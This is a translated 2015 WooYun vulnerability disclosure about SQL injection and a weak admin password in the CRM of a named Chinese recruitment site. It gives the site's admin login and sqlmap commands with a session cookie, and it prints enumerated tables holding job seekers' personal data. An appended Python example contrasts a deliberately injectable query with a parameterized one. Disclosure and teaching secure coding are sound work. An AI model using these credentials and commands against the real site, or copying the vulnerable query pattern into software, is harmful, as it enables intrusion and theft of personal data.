Vulnerability summary

Defect ID: wooyun-2015-0135732

Title: A vulnerability at 千里马人才网 (Qianlima Talent Network) exposes a talent database of over a million records & SQL injection

Related vendor: 千里马人才网

Author: 懒人

Submitted: 2015-08-21 09:48

Fix deadline: 2015-10-05 09:50

Published: 2015-10-05 09:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-21: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-10-05: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

http://crm.125job.com/login
Username: admin
Password: 123456

[Screenshot: 1.png]

[Screenshot: 2.png]

[Screenshot: 3.png]

[Screenshot: 4.png]


Clicking "edit user" goes straight into that user's personal center.

[Screenshot: 5.png]

[Screenshot: 6.png]

[Screenshot: 7.png]


sqlmap -u "http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2" --dbs --cookie SiteAccess=a3bf4f7355086552a8ee259294184085

[Screenshot: 8.png]


sqlmap -u "http://crm.125job.com/smanager/list?user=a&name=&departmentid=&yt0=%E6%90%9C%E7%B4%A2" --tables crm --cookie SiteAccess=a3bf4f7355086552a8ee259294184085


Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: crm
[135 tables]
+---------------------------------------+
| crm_activitylist |
| crm_corporation_reviews |
| crm_feedback |
| crm_notepad |
| crm_resultslist |
| crm_shopwindow |
| crm_shopwindowlist |
| dsafdf |
| duo_baoming |
| duo_card_list |
| duo_helps |
| duo_invest |
| duo_job_corporation_ok |
| duo_jobs_topset |
| duo_jobs_visited |
| duo_log_editcorbase |
| duo_manage_radio |
| duo_pinlun |
| duo_qqapi |
| duo_sitejob_list |
| duo_sms_log |
| duo_taobao_pic |
| duo_weiboapi |
| huodong_guaguale_hastime |
| huodong_guaguale_list |
| huodong_hrtest |
| huodong_jinli |
| huodong_sevenyear |
| huodong_snakeyearp |
| huodong_turntable |
| huodong_weijianli |
| job_accessing |
| job_adposition |
| job_adservice |
| job_advertise |
| job_advertise_apprise |
| job_advertisepos |
| job_age |
| job_age_job |
| job_age_person |
| job_application |
| job_apprise |
| job_class |
| job_com_tel |
| job_com_viseted |
| job_comment |
| job_corporation |
| job_corporation_appriseaccess |
| job_corporation_basis |
| job_corporation_extenscontact |
| job_corporation_giveuplog |
| job_corporation_groups |
| job_corporation_jobs |
| job_corporation_logins |
| job_corporation_manager |
| job_corporation_message |
| job_corporation_pic |
| job_corporation_plan |
| job_corporation_sale |
| job_corporation_search |
| job_corporation_services |
| job_corporation_sms |
| job_corporation_smspaylog |
| job_datum |
| job_en_person |
| job_gbooks |
| job_giveuplog |
| job_hh_case |
| job_hh_corporation_job |
| job_hh_person |
| job_investigate |
| job_ip |
| job_jobscontent_example |
| job_journal |
| job_links |
| job_mail |
| job_mail_host |
| job_mailorder |
| job_manager |
| job_manager_count |
| job_manager_radio |
| job_msg |
| job_news |
| job_news_special |
| job_notice |
| job_oa_corporation |
| job_oa_gbook |
| job_person |
| job_person_ability |
| job_person_authenticate |
| job_person_basis |
| job_person_book |
| job_person_card |
| job_person_edu |
| job_person_education |
| job_person_expand |
| job_person_file |
| job_person_garner |
| job_person_general |
| job_person_haswork |
| job_person_intention |
| job_person_jifen |
| job_person_job |
| job_person_journal |
| job_person_letter |
| job_person_logs |
| job_person_mailorder |
| job_person_manager_merge |
| job_person_merge |
| job_person_pugong |
| job_person_remark |
| job_person_search |
| job_person_spending |
| job_person_training |
| job_person_work |
| job_pseron_otherinfo |
| job_search |
| job_sitejob |
| job_sitejoblog |
| job_statistics |
| job_tag |
| job_tagged |
| job_talent |
| job_viewlogperson |
| job_weather |
| job_web_var |
| job_wei |
| job_windows |
| job_wish |
| job_worker |
| job_zhaoping_live |
| job_zhuanchang |
| weixin_config |
| weixin_keyword |
| zhuangpan_person |
+---------------------------------------+
[22:02:33] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 327 times
[22:02:33] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\SqlMap\SQLMAP~1\Bin\output\crm.125job.com'
[*] shutting down at 22:02:33

Proof of vulnerability:

Remediation:

Change the weak password and filter special characters.
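As an added illustration (not code from the report or from the 125job.com CRM), the search filter behind /smanager/list?user=&name=&departmentid= written the way the injection implies, beside a hardened version that binds every value as a query parameter and validates departmentid as an integer. The table and column names, and the sample rows, are constructed assumptions; the in-memory SQLite database stands in for the real crm database.

```python
import sqlite3

# Constructed sample data; the real schema of the crm database is not known.
ROWS = [
    ("admin", "Admin", 1),
    ("zhang", "Zhang San", 2),
    ("li", "Li Si", 2),
]


def make_db():
    """Build an in-memory table shaped like the assumed manager list."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE manager (user TEXT, name TEXT, departmentid INTEGER)")
    conn.executemany("INSERT INTO manager VALUES (?, ?, ?)", ROWS)
    return conn


def list_managers_vulnerable(conn, user="", name="", departmentid=""):
    """Request parameters concatenated into SQL: the defect class reported above."""
    sql = "SELECT user, name, departmentid FROM manager WHERE 1=1"
    if user:
        sql += " AND user LIKE '%" + user + "%'"
    if name:
        sql += " AND name LIKE '%" + name + "%'"
    if departmentid:
        sql += " AND departmentid = " + departmentid
    return conn.execute(sql + " ORDER BY user").fetchall()


def list_managers_safe(conn, user="", name="", departmentid=""):
    """Same filter, but values are bound as parameters and never become SQL text."""
    sql = "SELECT user, name, departmentid FROM manager WHERE 1=1"
    params = []
    if user:
        sql += " AND user LIKE ?"
        params.append("%" + user + "%")
    if name:
        sql += " AND name LIKE ?"
        params.append("%" + name + "%")
    if departmentid:
        # Numeric ids are validated, not "filtered": reject anything but digits.
        if not departmentid.isdigit():
            raise ValueError("departmentid must be an integer")
        sql += " AND departmentid = ?"
        params.append(int(departmentid))
    return conn.execute(sql + " ORDER BY user", params).fetchall()
```

With user="a" both versions return the two matching rows; with a quote in the value the vulnerable version returns every row while the safe version simply finds no user containing that literal string.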

Copyright notice: when reposting, cite the source 懒人@乌云


Vendor response

Vendor's reply:

The vendor could not be reached, or the vendor actively declined the report

Vulnerability Rank: 15 (WooYun rating)